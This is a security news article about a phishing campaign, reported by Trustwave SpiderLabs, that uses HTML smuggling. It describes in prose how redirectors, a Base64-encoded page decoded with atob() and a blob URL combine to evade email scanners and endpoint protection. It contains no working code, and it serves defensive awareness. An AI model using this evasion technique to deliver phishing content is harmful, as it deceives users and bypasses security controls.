HTML smuggling is a sophisticated technique used by threat actors to deliver malware by embedding malicious JavaScript within seemingly harmless HTML files.
This method exploits HTML5 and JavaScript features, allowing attackers to construct payloads directly on the victim’s machine when the HTML file is opened.
Trustwave SpiderLabs researchers recently identified that hackers have been actively abusing the HTML smuggling techniques to deliver sophisticated phishing pages.
Hackers Abuse HTML Smuggling Technique
Researchers uncovered a “sophisticated phishing campaign” employing “HTML smuggling.” The attack vector began with an email impersonating “American Express,” and this email contains a clickable link that acts as a ‘redirector.’
Free Webinar on How to Protect Small Businesses Against Advanced Cyberthreats -> Free Registration
While this initial redirect led to a second redirector, ultimately pointing to a “Cloudflare R2” public bucket hosting an ‘HTML file.’
The “JavaScript” utilized ‘HTML smuggling’ by encoding the actual phishing page as a long ‘Base64 string.’ Upon execution, the script using the “atob() function” decodes the ‘Base64 string’ into plain “HTML.”
After that it creates a “Blob object” from the ‘decoded HTML,’ then using “window.URL.createObjectURL()” it generates a ‘blob URL,’ and then it loads this content into the current browser window via “window.location.href.”
By delivering the malicious payload as seemingly harmless “HTML and JavaScript” the attackers evade certain security measures.This complete mechanism enables them to reveal the true phishing page upon client-side execution.
The entire process illustrates a “multi-stage” attack chain that is specifically designed to evade detection and deliver a convincing phishing experience to potential victims.
The “Blob URLs and URIs” are temporary web addresses that reference the binary data stored in blob objects.
While these objects enable threat actors to flexibly in handle the files and media within the web browsers.
However, threat actors exploit this technology via “HTML smuggling” to generate malicious files directly in the “user’s browser” rather than ‘downloading them from a server.’
This method creates the “client-side files” which helps in evading the security measures that monitors the ‘incoming server-side content.’
Besides this, HTML smuggling enables the covert distribution of harmful payloads disguised as harmless data.
Using blob URLs to create and handle files locally enables attackers to conduct covert operations that are difficult to notice and trace.
This technique is particularly effective in the cloud era, as it evades the “email scanners,” “endpoint protection,” and other “security tools” by hiding phishing content within seemingly harmless HTML files.
This process usually involves the embedding of obfuscated JavaScript code, when it’s executed it make use of the blob URLs to generate and deploy a malicious payload. This complete process makes the detection more challenging.
Analyse Any Suspicious Links Using ANY.RUN’s New Safe Browsing Tool: Try It for Free